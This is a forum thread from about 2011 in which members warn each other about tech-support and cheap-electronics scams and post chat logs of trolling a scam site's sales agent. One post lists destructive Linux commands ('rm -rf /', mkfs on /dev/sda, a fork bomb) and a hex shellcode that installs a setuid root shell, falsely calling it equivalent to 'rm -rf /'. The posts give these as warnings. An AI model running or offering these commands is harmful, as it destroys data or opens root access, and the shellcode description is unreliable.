Hello all! Please ensure that you are posting a new thread or question in the appropriate forum. The Feedback forum is overwhelmed with questions that are having to be moved elsewhere. If you need help to verify your account contact hello@boards.ie
Hi all! We have been experiencing an issue on site where threads have been missing the latest postings. The platform host Vanilla are working on this issue. A workaround that has been used by some is to navigate back from 1 to 10+ pages to re-sync the thread and this will then show the latest posts. Thanks, Mike.

Big thread of Chinese/Nigerian scams

• Banned (with Prison Access) Posts: 34,567 ✭✭✭✭Biggins

The_B_Man wrote: »
    ...I only hope they werent using some sort of free/cheap phone call software like skype.
    Even if they were, an hour of their time wasted, is an hour of them ripping people off less!

Win!

• Closed Accounts Posts: 18,163 ✭✭✭✭Liam Byrne

The_B_Man wrote: »
    ye thats what i did. Played the dumb card, and they brought me through the whole process of buying some software on me credit card. Obviously i lied to them when i said i put in me CC details.

Did they give you a URL for this ?

Because if so you should check out the internic database and see if you can get the site shut down.

• Registered Users, Registered Users 2 Posts: 1,355 ✭✭✭Belfast

I did Microsoft technical support for windows many years ago for Microsoft.

in that time I never called anyone to tell them about a problem on their computer.

• Closed Accounts Posts: 18,163 ✭✭✭✭Liam Byrne

Belfast wrote: »
    I did Microsoft technical support for windows many years ago for Microsoft.

in that time I never called anyone to tell them about a problem on their computer.

There probably wasn't much need - sure the Windows logo is pretty prominent @ startup! :D

• Registered Users, Registered Users 2 Posts: 10,992 ✭✭✭✭partyatmygaff

Biggins wrote: »
    Exactly - something like "me mate told me to try formatting my drive "C" - I'm just about to start doing that. Thank god ye rang, yis can help me do it!" :pac:

NOTE to members here:
    - DO NOT format your drive "C" unless you TOTALLY know what you are doing and why!
    You can't format 'C' (Or whatever partition your OS is being run from) anyway. You need to unmount a drive before formatting it and you can't unmount it whilst the OS is running. Same goes for most OS.

• Registered Users, Registered Users 2 Posts: 11,554 ✭✭✭✭alwaysadub

My sister gives the phone to her two year old when they ring her. She has great chats about Peppa Pig! :D

You can't format 'C' (Or whatever partition your OS is being run from) anyway. You need to unmount a drive before formatting it and you can't unmount it whilst the OS is running. Same goes for most OS.
    You can if you know what your doing but I won't say here how to do it.
    Best not.

You can if you know what your doing but I won't say here how to do it.
    Best not.
    Of course you could but it's nowhere near as simple as right clicking on C and pushing format. Even format C:\ on the command line won't work. The only way to do it is to recursively delete all the files on the partition.

On Linux and Mac OS it's far too easy to do. An unknowing user can easily be told to run a command to format their computer without realising it. A few examples for Linux are
    rm -rf /
    This deletes everything in your root directory effectively formatting your drive
    char esp[] __attribute__ ((section(".text"))) /* e.s.p
    release */
    = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
    "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
    "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
    "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
    "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
    "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
    "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
    "cp -p /bin/sh /tmp/.beyond; chmod 4755
    /tmp/.beyond;";
    The exact same as the previous command except in hex, this can even fool experienced Linux users.
    mkfs.ext3 /dev/sda
    Extremely destructive. This will wipe out an entire logical device.
    :(){:|:&};: - In 'English' this means fork while work
    The forkbomb. Causes a process to start and then spawn two more processes from it. It can be stopped by an experienced Linux user but if left to run it can cause data loss.
    any_command > /dev/sda
    Causes random data to be written to the block device leading to a total loss of data on the device.

It goes without saying that Linux and Mac users shouldn't go typing any of that in to a terminal window :pac:

Of course you could but it's nowhere near as simple as right clicking on C and pushing format...
    It nearly is if you use a common third party freely available tool (Unlocker tool) amid other similar tools.
    ...But I'll shut up with the techie bit, I'm pulling the thread off track! :o

It nearly is if you use a common third party freely available tool (Unlocker tool) amid other similar tools.
    ...But I'll shut up with the techie bit, I'm pulling the thread off track! :o
    There's a simpler one involving typing three letters and three slashes in the command prompt. Maybe I can try and 'fix' the caller's computer over the phone if I over to pay them for the privilege? :pac:

• Registered Users, Registered Users 2 Posts: 6,827 ✭✭✭fred funk }{

Got an email today with a link to this site. Its a scam, the prices are ridiculously cheap. They also only use Western Union and direct wired transfer to their account.

Just letting you all know about it.

http://www.yahui-vip.com/

• Closed Accounts Posts: 36,634 ✭✭✭✭Ruu_Old

Bollix, just spent over a grand. A bit late now. :o Better send an email to that trusty looking hotmail address in the contacts.

• Registered Users, Registered Users 2 Posts: 882 ✭✭✭darragh16

Add them on MSN there...

• Closed Accounts Posts: 2,836 ✭✭✭TanG411

But, but. . . the prices. . . they're so cheeeeeap.

I must buy a phone.

• Registered Users, Registered Users 2 Posts: 8,061 ✭✭✭Uriel.

The interwebz is a scary place.... OP time to ask mammy for a glass of milk and cookie and get yourself tucked up in bed before you have nightmares

• Closed Accounts Posts: 15,515 ✭✭✭✭admiralofthefleet

Ruu wrote: »
    Bollix, just spent over a grand. A bit late now. :o Better send an email to that trusty looking hotmail address in the contacts.

ten hail marys and an our father please

• Closed Accounts Posts: 22,559 ✭✭✭✭AnonoBoy

Just as well you told me it was a scam.

I'm a renowned f*cking idiot who parts with my credit card details very readily as soon as someone tells me this:
    We have our own warehouse and stores, we have clients all over the world, and we have been received very high praise from our customers.
    If you have some suggestions about our products or our service, please tell us ,and we must accept and improve ,and appreciate you very much. we hope we can cooperate happily in the long term.

• Moderators, Science, Health & Environment Moderators, Society & Culture Moderators Posts: 60,170 Mod ✭✭✭✭Wibbs

Brought to you from China, the land of tack and intellectual property theft and scams.

Rejoice in the awareness of feeling stupid, for that’s how you end up learning new things. If you’re not aware you’re stupid, you probably are.

• Banned (with Prison Access) Posts: 1,076 ✭✭✭Rawhead

AnonoBoy wrote: »
    Just as well you told me it was a scam.

I'm a renowned f*cking idiot who parts with my credit card details very readily as soon as someone tells me this:

Very good

• Registered Users, Registered Users 2 Posts: 81,220 ✭✭✭✭biko

Oh, someone got burned at a Chinese cheap stuff site.

i just asked for info on an lg tv, cant wait til they get back to me

I was just on the live web chat. I was trying to tell him a knock knock joke. He was having none of it.:)

• Registered Users Posts: 353 ✭✭yizorselves

I've seen a lot of Chinese scammers that managed to get PayPal as a payment method. If these cant do that then they must be a right shower of bastids. Or maybe they werent bothered. Someone buy a load of stuff and let us know how you get on.

Go on you're mad do it!

• Registered Users, Registered Users 2 Posts: 3,805 ✭✭✭Setun

That may be a scam but I just got an email from a fella in Burkina Faso who is on the level. PM me for moar details. ;)

this is the text so far of the chat im having with them:

System Message(1000)2011-01-11 02:27:29
    Congratulation!Login successfully.
    yahuivip(9105338)2011-01-11 02:27:13
    Hi! Welcome to visit our website! Can i help you,please?
    you 2011-1-10 18:27:51
    hi, im an interested in a telly
    yahuivip(9105338)2011-01-11 02:27:42
    which one?
    you 2011-1-10 18:28:13
    a big one
    yahuivip(9105338)2011-01-11 02:28:09
    please tell the name of the tv
    you 2011-1-10 18:28:40
    stephen
    yahuivip(9105338)2011-01-11 02:28:36
    please tell us the name of the TV you want to buy, ok?
    you 2011-1-10 18:29:15
    i live in ireland, will stephen work in ireland

System Message(1000)2011-01-11 02:34:06

yahuivip(9105338)2011-01-11 02:33:48

you 2011-1-10 18:34:22
    Yes, do you accept PayPal?

yahuivip(9105338)2011-01-11 02:34:23
    yes, but only for our VIP

you 2011-1-10 18:34:58
    and how do I become a VIP?

yahuivip(9105338)2011-01-11 02:35:24
    after you finish your first order on our website

you 2011-1-10 18:36:27
    ok, I would like to buy around 2000 iPhones, is that too much?

yahuivip(9105338)2011-01-11 02:37:20
    not too much

ou 2011-1-10 18:35:2
    I would like to buy a phone
    yahuivip(9105338)2011-01-11 02:35:06
    which one?
    you 2011-1-10 18:35:58
    a small one
    yahuivip(9105338)2011-01-11 02:35:53
    please tell the name
    you 2011-1-10 18:36:29
    Patrick
    yahuivip(9105338)2011-01-11 02:37:10
    i mean which mobile you want to buy from our website
    you 2011-1-10 18:38:1
    I dont wanta mobile I want a phone.
    yahuivip(9105338)2011-01-11 02:37:59
    i will send the link to you, ok?
    yahuivip(9105338)2011-01-11 02:38:48
    http://www.yahui-vip.com/productlist.asp?pid=10350000

what i say is in bold and his replies are in italics

yahuivip(9105338)2011-01-11 02:29:04
    yes, of course
    you 2011-1-10 18:30:53
    ah great, what is the cost
    yahuivip(9105338)2011-01-11 02:31:15
    yahuivip(9105338)2011-01-11 02:31:23
    you can take a look first
    you 2011-1-10 18:32:19
    ah grand
    you 2011-1-10 18:33:11
    ?
    yahuivip(9105338)2011-01-11 02:32:49
    http://www.yahui-vip.com/productlist.asp?pid=10330000
    you 2011-1-10 18:33:38
    i will pay 6 magic beans for tv

• Registered Users, Registered Users 2 Posts: 2,593 ✭✭✭Sea Sharp

Mesa give very good deal.

You likey camera, camera love you long time honey.

• Registered Users, Registered Users 2 Posts: 509 ✭✭✭PyeContinental

System Message(1000)2011-01-11 02:10:49
    yahuivip(9105338)2011-01-11 02:10:37
    you 2011-1-10 18:11:19
    Hello, what is the newest, fastest cpu?
    yahuivip(9105338)2011-01-11 02:11:17
    you can enter our website and take a look first
    you 2011-1-10 18:12:4
    I can't tell which is the fastest. Can you tell me which is fastest?
    yahuivip(9105338)2011-01-11 02:12:18
    we do not sell cpu, we sell the whole laptop.
    you 2011-1-10 18:12:52
    which is the fastest one?
    yahuivip(9105338)2011-01-11 02:13:10
    yahuivip(9105338)2011-01-11 02:13:13
    one moment,please
    you 2011-1-10 18:13:57
    yes please
    yahuivip(9105338)2011-01-11 02:14:00
    http://www.yahui-vip.com/productlist.asp?pid=10330000
    yahuivip(9105338)2011-01-11 02:14:26
    I can not tell you which is the fastest one, because most are fast.
    you 2011-1-10 18:15:24
    That shows me lots of laptops. I want the fastest one. Please help me tell which is the fastest one.
    yahuivip(9105338)2011-01-11 02:15:24
    ok, one moment,please, i will introduce one to you, ok?
    you 2011-1-10 18:16:5
    yes please. Which is the fastest one.
    yahuivip(9105338)2011-01-11 02:16:14
    http://www.yahui-vip.com/product.asp?id=4096
    yahuivip(9105338)2011-01-11 02:16:21
    you can see this first
    you 2011-1-10 18:17:32
    Is that the fastest one? Is Alien a good brand?
    yahuivip(9105338)2011-01-11 02:17:17
    yes, of course
    you 2011-1-10 18:17:57
    I did not hear of Alien. Do they own Dell?
    yahuivip(9105338)2011-01-11 02:17:56
    yes, one moment,please
    yahuivip(9105338)2011-01-11 02:18:10
    http://www.yahui-vip.com/product.asp?id=4095
    yahuivip(9105338)2011-01-11 02:18:17
    How about this one?
    you 2011-1-10 18:19:13
    Is this one even faster?
    yahuivip(9105338)2011-01-11 02:19:01
    more or less
    you 2011-1-10 18:19:28
    Does it play games well?
    you 2011-1-10 18:19:37
    Is it more or less fast?
    yahuivip(9105338)2011-01-11 02:19:09
    yes, of course
    yahuivip(9105338)2011-01-11 02:19:20
    more fast
    you 2011-1-10 18:20:6
    Very good. It is less money for more speed - that is strange, no?
    yahuivip(9105338)2011-01-11 02:20:25
    other allocation are different
    yahuivip(9105338)2011-01-11 02:20:59
    you can read the product description carefully if you want.
    you 2011-1-10 18:26:20
    Will it play Call of Duty 4?
    yahuivip(9105338)2011-01-11 02:26:11
    yes, of course
    you 2011-1-10 18:26:57
    Ah good, and does it play all the xbox live games?
    yahuivip(9105338)2011-01-11 02:26:43
    yes
    you 2011-1-10 18:27:17
    What about the PS3?
    yahuivip(9105338)2011-01-11 02:28:55
    no problem
    you 2011-1-10 18:29:31
    Does it have Gran Turismo 5?
    yahuivip(9105338)2011-01-11 02:29:21
    yes
    you 2011-1-10 18:30:15
    Can I play it online with my friend or will he need a new modem?
    yahuivip(9105338)2011-01-11 02:30:36
    yes
    yahuivip(9105338)2011-01-11 02:30:47
    he does not need a new model
    you 2011-1-10 18:31:47
    Ah good, and is it compatible with the wii kinect move?
    yahuivip(9105338)2011-01-11 02:35:38
    you can order the product you want to buy
    you 2011-1-10 18:36:39
    Yes it sounds good to me, but I wonder will it work with the wii fit plus?
    yahuivip(9105338)2011-01-11 02:36:45
    yes
    you 2011-1-10 18:39:54
    Ok, that is brilliant! Will I need more ram for facebook though?
    yahuivip(9105338)2011-01-11 02:40:50
    no, you do not need
    you 2011-1-10 18:43:18
    Wow, that's great. Thanks for being so honest. I didn't know if I needed to add more terabytes
    you 2011-1-10 18:43:39
    Does it do twitter also?
    yahuivip(9105338)2011-01-11 02:43:44
    no
    you 2011-1-10 18:45:32
    Will it need more ram for that?
    yahuivip(9105338)2011-01-11 02:45:14
    no
    yahuivip(9105338)2011-01-11 02:45:19
    you do not need
    you 2011-1-10 18:45:50
    what will it need?
    yahuivip(9105338)2011-01-11 02:46:15
    it can be upgraded by itself
    you 2011-1-10 18:46:58
    It is auto updating for twitter?
    yahuivip(9105338)2011-01-11 02:46:47
    yes
    you 2011-1-10 18:47:51
    Can I download the twitter update from Microsoft? Then will it work?
    yahuivip(9105338)2011-01-11 02:47:55
    yes, you can download it, and it can work then.
    you 2011-1-10 18:48:33
    Is that similar to an ipad or not?
    yahuivip(9105338)2011-01-11 02:48:27
    yes
    you 2011-1-10 18:49:16
    Can I get youtube on it then?
    yahuivip(9105338)2011-01-11 02:48:56
    yes
    you 2011-1-10 18:49:37
    with an update or does it come preinstalled?
    yahuivip(9105338)2011-01-11 02:49:59
    YES
    you 2011-1-10 18:50:33
    Excellent!
    you 2011-1-10 18:51:9
    I think that is all I need to know, but if I have forgotten to ask something, can I talk to you again to check?
    yahuivip(9105338)2011-01-11 02:50:56
    yes, of course
    you 2011-1-10 18:57:22
    Great, what is your number to call? Do you have an email address too?
    yahuivip(9105338)2011-01-11 02:57:39
    yes, our email address is yahui_vip@188.com
    yahuivip(9105338)2011-01-11 02:57:57
    you can send emails to us if you need
    you 2011-1-10 18:58:34
    But is that the email only for you? What is your name?
    yahuivip(9105338)2011-01-11 02:58:40
    my name is Wilson
    yahuivip(9105338)2011-01-11 02:58:56
    it is not for me, it is the email address for my job
    you 2011-1-10 18:59:51
    How can I send an email directly to you or call you on the phone personally?
    yahuivip(9105338)2011-01-11 02:59:58
    you have our email address now, you can send an email directly to us now
    you 2011-1-10 19:1:23
    But I don't want to have to go through the same questions again with someone else. You know what we have talked about now, so I would like to be able to get in contact with you directly?
    yahuivip(9105338)2011-01-11 03:01:41
    But my oral english is not good
    yahuivip(9105338)2011-01-11 03:01:50
    do you have MSN?
    you 2011-1-10 19:2:47
    yes
    you 2011-1-10 19:3:25
    but I would like to call you to give my credit card details as it's not safe on the MSN
    yahuivip(9105338)2011-01-11 03:03:26
    sorry, we do not accept credit card for new customers
    you 2011-1-10 19:4:51
    Oh
    you 2011-1-10 19:5:8
    How do I pay? Is it cash on delivery?
    yahuivip(9105338)2011-01-11 03:05:11
    we only send the goods in 12 hours after we confirm your payment
    you 2011-1-10 19:6:20
    What are the payment methods?
    yahuivip(9105338)2011-01-11 03:06:51
    For new customers, you can choose bank transfer or western union
    you 2011-1-10 19:7:51
    Could I post you the cash by registered mail?
    yahuivip(9105338)2011-01-11 03:08:22
    it is not fast, you can send your payment receipt to us by email after you pay by bank transfer or western union.
    you 2011-1-10 19:9:32
    I don't know how to do a bank transfer? Can I send you a postal order from the post office?
    yahuivip(9105338)2011-01-11 03:10:16
    Do you know how to make an order on our website now?
    yahuivip(9105338)2011-01-11 03:10:29
    we will check and confirm your order and send an email to you/
    you 2011-1-10 19:11:38
    I think so, but I'm not sure how to pay. Why won't you take credit card details from new customers?
    yahuivip(9105338)2011-01-11 03:11:33
    it is the rules of our company
    you 2011-1-10 19:12:10
    But why does the rule exist?
    yahuivip(9105338)2011-01-11 03:12:14
    you can go to bank of UK to pay by bank transfer, it is easy and fast and also secure for you
    yahuivip(9105338)2011-01-11 03:12:18
    sorry, i do not know
    you 2011-1-10 19:13:25
    I could send you a bank draft from the bank. What is your address?
    yahuivip(9105338)2011-01-11 03:13:10
    one moment,please
    yahuivip(9105338)2011-01-11 03:13:30
    Bank name : Bank of China(Shanghai Branch)

Bank address : Number 168, Lujiazui west Road, Pudong New District, Shanghai City, China.

The holder name : Peng fei Wang

A/C No : 4563510800032447665

SWIFT CODE : BKCHCNBJ300

City : Shanghai

you 2011-1-10 19:14:42
    Ah ok good
    you 2011-1-10 19:14:57
    I have a bank draft already that I could send to you.
    yahuivip(9105338)2011-01-11 03:14:44
    ok
    you 2011-1-10 19:15:24
    It is made out for the sum of $4000
    yahuivip(9105338)2011-01-11 03:15:18
    it will not need that much
    you 2011-1-10 19:16:0
    If I could buy the cpu for $1000, would you send me the change?
    yahuivip(9105338)2011-01-11 03:15:36
    you can make an order first for the dell laptop on our website now
    yahuivip(9105338)2011-01-11 03:15:50
    yes, of course
    you 2011-1-10 19:16:31
    Excellent.
    you 2011-1-10 19:17:25
    I will send you the bank draft for $4000. Please send me the laptop and put $3000 in the box as soon as you get the bank draft.
    yahuivip(9105338)2011-01-11 03:17:10
    ok
    yahuivip(9105338)2011-01-11 03:17:14
    no proble,
    yahuivip(9105338)2011-01-11 03:17:18
    no problem
    you 2011-1-10 19:17:49
    I will go and order the cpu from the website now
    you 2011-1-10 19:18:32
    Do you need to know my address now?
    yahuivip(9105338)2011-01-11 03:18:30
    you can write it in your order
    yahuivip(9105338)2011-01-11 03:18:46
    we need specific address in order to send the goods right to you
    you 2011-1-10 19:20:21
    Ah great, and will I sign the bank draft for Mr Peng fei Wang?
    yahuivip(9105338)2011-01-11 03:20:10
    yes, that's right
    yahuivip(9105338)2011-01-11 03:20:16
    please make an order first now
    you 2011-1-10 19:20:46
    and you won't forget to send me the change?
    yahuivip(9105338)2011-01-11 03:21:06
    yes, of course, we will not forget
    you 2011-1-10 19:23:13
    That's great! Just put the cash in a brown envelope in the box with the cpu I think is best.
    yahuivip(9105338)2011-01-11 03:23:32
    ok, no problem
    yahuivip(9105338)2011-01-11 03:23:47
    as normal you can receive the package in 4 to 5 days
    you 2011-1-10 19:24:31
    Excellent. Does it come from China?
    yahuivip(9105338)2011-01-11 03:24:27
    yes, from Shanghai
    you 2011-1-10 19:25:19
    Brilliant. Have a great day Wilson!
    yahuivip(9105338)2011-01-11 03:25:16
    have a great day too
    you 2011-1-10 19:26:11
    My name is Brian :)
    yahuivip(9105338)2011-01-11 03:26:01
    ok, nice name
    yahuivip(9105338)2011-01-11 03:26:13
    can i have your email address,please?
    you 2011-1-10 19:26:42
    I like it too!
    you 2011-1-10 19:27:4
    yes it is www.hotmail.com
    yahuivip(9105338)2011-01-11 03:27:10
    it is not email address
    you 2011-1-10 19:28:1
    www@hotmail.com

you 2011-1-10 19:28:10
    sorry
    yahuivip(9105338)2011-01-11 03:28:01
    ok, you are welcome
    you 2011-1-10 19:28:35
    ok that's great!
    yahuivip(9105338)2011-01-11 03:28:55
    We have keep your email address in to our contacts
    you 2011-1-10 19:30:5
    Ah good. Yes you can write to me any time.
    yahuivip(9105338)2011-01-11 03:30:03
    ok, no problem
    yahuivip(9105338)2011-01-11 03:30:17
    have you made your order on our website already?
    you 2011-1-10 19:31:8
    No I was too busy talking to you!
    yahuivip(9105338)2011-01-11 03:31:10
    ok, you can make it now
    you 2011-1-10 19:31:42
    I will order it next!
    yahuivip(9105338)2011-01-11 03:31:28
    ok
    you 2011-1-10 19:32:4
    I need to concentrate on one thing at a time
    you 2011-1-10 19:32:12
    Ok thank you for all your help
    yahuivip(9105338)2011-01-11 03:31:48
    that's good
    yahuivip(9105338)2011-01-11 03:31:51
    you are welcome
    you 2011-1-10 19:32:38
    ok bye for now Wilson. I will call you tomorrow to make sure you got the order ok.
    yahuivip(9105338)2011-01-11 03:32:23
    bye
    you 2011-1-10 19:32:55
    byte

• Closed Accounts Posts: 144 ✭✭CrazyBiscuit

This stuff belongs on the Art of Trolling.

System Message(1000)2011-01-11 02:50:28

yahuivip(9105338)2011-01-11 02:50:11

you 2011-1-10 18:50:40
    Du hello?

you 2011-1-10 18:50:47
    I am looking to be buying the iPhone 4?

yahuivip(9105338)2011-01-11 02:50:38
    ok, you can order it first on our website

you 2011-1-10 18:52:24
    But I have problem big boi, I was trying to pay by the western uniom for delivery by DHL but when I put in credit card number I accidentally the whole thing

yahuivip(9105338)2011-01-11 02:53:04
    we can send the tracking unmber to you by email, you can also use the tracking number to check the delivery status for your goods by internet then.

you 2011-1-10 18:53:53
    yes, but I accidentally the whole thing when pay by credit card

you 2011-1-10 18:54:1
    I send $5000 instead of $500

you 2011-1-10 18:54:12
    I don't want money back, maybe I buy 10 iphone 4 instead?

yahuivip(9105338)2011-01-11 02:53:47
    but you are not our VIP at the moment.

yahuivip(9105338)2011-01-11 02:54:32
    you can buy one iphone first, if your first order goes well, you can pay by credit card for your next orders, ok?

you 2011-1-10 18:55:24
    but what if I find cheaper seller before? I already pay the 5000 dolla, how many iPhone 4 is that/

yahuivip(9105338)2011-01-11 02:55:41
    our iphone is original and new, if you find cheaper one, you can go to buy it from other places

you 2011-1-10 18:57:11
    ok whatever big boi, but thing is important is that i already pay the 5000 dolla by accrident, so i now be get 1 iPhone 4 or 10 iPhone 4?

yahuivip(9105338)2011-01-11 02:58:30
    ok, you can make an order on our website first if you need.

you 2011-1-10 19:0:21
    But I orready make the order for da 1 iPhone

yahuivip(9105338)2011-01-11 03:00:20
    ok

you 2011-1-10 19:0:48
    I was told pay 500 dolla but instead I pay 5000 dolla but now I decide to sell iPhone in my home country so could I change order to 10 iPhone?

yahuivip(9105338)2011-01-11 03:00:27
    what is your order number on our website

you 2011-1-10 19:1:1
    yahuivip(9105338)2011-01-11 03:00:38
    yes, of course

yahuivip(9105338)2011-01-11 03:00:55
    what is your order number on our website?

you 2011-1-10 19:4:33
    Have you change da order yet?

yahuivip(9105338)2011-01-11 03:04:39
    we do not see your order on our website now

you 2011-1-10 19:5:12
    how?
    yahuivip(9105338)2011-01-11 03:05:35
    you can click on" Buy it now" on the page of iphone

you 2011-1-10 19:6:22
    but i did already and i pay already, why do again?

yahuivip(9105338)2011-01-11 03:06:11
    you have paid already?

you 2011-1-10 19:6:46
    ya I say that long time ago

yahuivip(9105338)2011-01-11 03:06:28
    we do not have your order now, how did you pay?

you 2011-1-10 19:7:17
    I got email from you people after I make order give me order no. and pay instructions

you 2011-1-10 19:7:43
    I was told pay 500 dolla but I make mistake and pay 5000 dolla and that's why i want change order from 1 to 10 iphone 4

yahuivip(9105338)2011-01-11 03:07:33
    did you order on our website before?

you 2011-1-10 19:8:29
    no this is first time, yeah

you 2011-1-10 19:8:48
    i am verrly confused

yahuivip(9105338)2011-01-11 03:08:55
    you did not order on our website

you 2011-1-10 19:9:39
    I did, that is what happen

you 2011-1-10 19:10:2
    I want to make bigger order next time, this was supposed to be test order for 1 iphone

yahuivip(9105338)2011-01-11 03:09:38
    ok, you can make an order first on our website now if you need, ok?

you 2011-1-10 19:10:15
    I already made order and paid though

yahuivip(9105338)2011-01-11 03:09:49
    yes, it is good idea

you 2011-1-10 19:10:46
    remember i say i make order for 1 iphone and was tell pay 500 dolla? then I make mistake and pay 5000 dolla so i ask you to change order for 10 iphone

yahuivip(9105338)2011-01-11 03:11:02
    But we do not got any orders from you

you 2011-1-10 19:11:51
    i don't know i make order and pay you that is all i know

you 2011-1-10 19:12:42
    i really want to do big business with you but i can't if i have problem like this a lot

yahuivip(9105338)2011-01-11 03:13:01
    But we really have not got any orders from you now

you 2011-1-10 19:14:4
    but what about my money? i pay money already, please don't be mean I want to do lot of buziness with you

yahuivip(9105338)2011-01-11 03:14:12
    maybe you mistake the websites

you 2011-1-10 19:14:58
    no i am 100% sure is this one, my friend tell me about it

you 2011-1-10 19:15:6
    he say you prices are verry cheep

yahuivip(9105338)2011-01-11 03:14:57
    We are a wholesaler and we get our product directly from a big manufacturer, which has a lower labor force and original materials.

you 2011-1-10 19:15:44
    and that you sell a the iPhone so I say to myself "I am going to buy lot of iPhone and sell here for profit"

you 2011-1-10 19:15:52
    yes I know is very good

you 2011-1-10 19:16:12
    so what I do about my order? once I get my order and if good I going to make big bulk order

you 2011-1-10 19:16:19
    maybe 100/200 iPhone 4

yahuivip(9105338)2011-01-11 03:16:11
    i know that, what is your order number on our website?

yahuivip(9105338)2011-01-11 03:16:16
    can you tell us, please?

you 2011-1-10 19:17:1

you 2011-1-10 19:17:6
    that is what email i got say

yahuivip(9105338)2011-01-11 03:18:08
    but we have checked it for you already on our website, there is not any order number like that.

you 2011-1-10 19:19:6
    but what i do now? when i going to get my order?

yahuivip(9105338)2011-01-11 03:19:14
    we do not receive your order on our website

you 2011-1-10 19:20:34
    but you have my money already, that good enough?

yahuivip(9105338)2011-01-11 03:20:34
    we do not have your money, my friend

you 2011-1-10 19:21:0
    i meant to pay 500 dolla but instaed I pay 5000 dolla

you 2011-1-10 19:21:12
    this was accidrent

yahuivip(9105338)2011-01-11 03:20:47
    who did you transfered to ?

you 2011-1-10 19:21:21
    to your company

yahuivip(9105338)2011-01-11 03:21:29
    what is the receiver's name?

you 2011-1-10 19:22:2
    peng fei wang I think

you 2011-1-10 19:22:33
    num 3, dongchun rd, minghang, shanghai, china

yahuivip(9105338)2011-01-11 03:22:11
    what is the website you ordered?

you 2011-1-10 19:23:14
    www.yahui-vip.com
    yahuivip(9105338)2011-01-11 03:23:10
    when did you transfered?

you 2011-1-10 19:23:40
    Three day ago

yahuivip(9105338)2011-01-11 03:25:02
    ok, one moment,please, i will check it for you, ok?

you 2011-1-10 19:25:34
    thanks you very much

yahuivip(9105338)2011-01-11 03:25:49
    you are welcome

you 2011-1-10 19:30:14
    OMG I hear from friend is that you scam scam? Is true?

yahuivip(9105338)2011-01-11 03:30:53
    we are a formal company in Shanghai

you 2011-1-10 19:31:29
    But they say you scam because yahoo email and western union?

yahuivip(9105338)2011-01-11 03:31:24
    no

you 2011-1-10 19:32:9
    ok so have you found money sent yet?

yahuivip(9105338)2011-01-11 03:35:34
    one moment,please

you 2011-1-10 19:39:32
    are you sure you not scammer?

yahuivip(9105338)2011-01-11 03:39:50
    yes, of course

you 2011-1-10 19:40:25
    then why you take hours to find money?

yahuivip(9105338)2011-01-11 03:40:38
    we have not received your money until now

yahuivip(9105338)2011-01-11 03:40:57
    and we did not receive any orders from you, maybe you mistake the websites

you 2011-1-10 19:41:30
    I didn't I pay money already

you 2011-1-10 19:44:47
    so what I do now?

yahuivip(9105338)2011-01-11 03:45:31
    sorry, i do not know, you should contact the website from which you buy the iphone

you 2011-1-10 19:46:20
    i am already though

you 2011-1-10 19:46:40
    this is the website and i have already send the 5000 dolla to peng fei wang

yahuivip(9105338)2011-01-11 03:46:49
    please send your payment receipt to us by email, we will check it for you again

yahuivip(9105338)2011-01-11 03:47:00
    our email address is yahui_vip@188.com

you 2011-1-10 19:49:8
    but how I do that? I pay in bank and they said the money will arrive to you in 6 hours

you 2011-1-10 19:49:25
    I pay extra 100 dolla for ultra fast transfer

yahuivip(9105338)2011-01-11 03:49:17
    if you do not send it to us, how can we know you have paid to us?

you 2011-1-10 19:49:55
    call bank and ask?

yahuivip(9105338)2011-01-11 03:49:46
    you can do it now

you 2011-1-10 19:50:21
    but I can't, it's your bank

yahuivip(9105338)2011-01-11 03:50:23
    but our bank have not receive the money from you, my friend

System Message(1000)2011-01-11 03:50:59
    The partner is offline now! We will leave a message or SMS to your partner!

Ah, one hour of pure trolling. :pac:

• Closed Accounts Posts: 22,559 ✭✭✭✭AnonoBoy

I want a camera please.

which one?

Canon 7D please.

one moment,please

where do i mail money to?

you can pay by western union or bank transfer

you can get our bank details on our website directly

that sounds completely trustworthy

will u promise me you not lie to me

yes, of course, we are a formal company in Shanghai, China

promise?

it is foolish for us to lie to our customers

Super duper promise?

you can check our company by internet if you need

Ok I use netscape search engine now

PLEASE HOLD

Ok you seem reliable

Tell me where I can mail the money to

you can mail the money by western union or bank transfer

I have a big jar of coins that I want to buy the camera with. I will mail that to you in a big box.

What is the address?

one moment,please

ok

I will sing a song while I am waiting

la-la-la-

shoba-dooba-doo

'Here I go again on my own - woah woah!'

'Going down the only road I've ever known - woooh! Wooooh!

you need to make an order first on our website if you want to buy the camera 7D

ok - I am ordering the camera now

ORDER DONE

OK

Now, what address do I mail the box of coins to for payment?

our email address is yahui_vip@188.com

What is your postal address?

I cannot email a box of coins to you.

The Western Union address is as follows:
    -First name : Peng fei

-Last name : Wang

-City : Shanghai
    -Post code : 200011
    -Address : Number 03, Dongchun Road, Minghang District, Shanghai, China

Ok - I will send my brother to that address with the box of coins.

He will be there at 4pm tomorrow.

His name is Peader. You can give the camera to him.

That ok?

yes, of course

but you need to make an order first on our website

But I just asked you for the camera

That is order
    My brother will be at your office tomorrow with the money. Give him the camera

sorry, we only accept deals on line

Too late, my brother is already on his way to your office, he has the box of coins.

He is a very big man with a bad temper

I suggest you have the camera ready

or he will get angry and you won't like him when he's angry

• Registered Users Posts: 2,718 ✭✭✭upandcumming

Got an email today with a link to this site. Its a scam, the prices are ridiculously cheap. They also only use Western Union and direct wired transfer to their account.

Just letting you all know about it.

http://www.yahui-vip.com/
    There is a thousand websites like this. If someone made a thread for every one of these sites, boards.ie would be out of business.

Ha, the chats offline.

• Registered Users, Registered Users 2 Posts: 3,194 ✭✭✭FatRat

He's dead wide now. Asks what brand instead of what name. Nice one for pointing it out though.

One time I was selling a car and the guy sent me a cheque for 18000 but the car was only 9000 so I had to send him back 9000. It wasn't until after he had my car that the check bounced and he also had 9000 belonging to me. I trusted him as he was a prince. Wont be doing that again.

HA!

• Closed Accounts Posts: 1,842 ✭✭✭seanbmc

Well done lads, keep up the trolling :D.

• Registered Users, Registered Users 2 Posts: 3,194 ✭✭✭FatRat

yahuivip(9105338)2011-01-11 04:17:18
    you 2011-1-10 20:18:2
    Hi
    yahuivip(9105338)2011-01-11 04:17:27
    hi
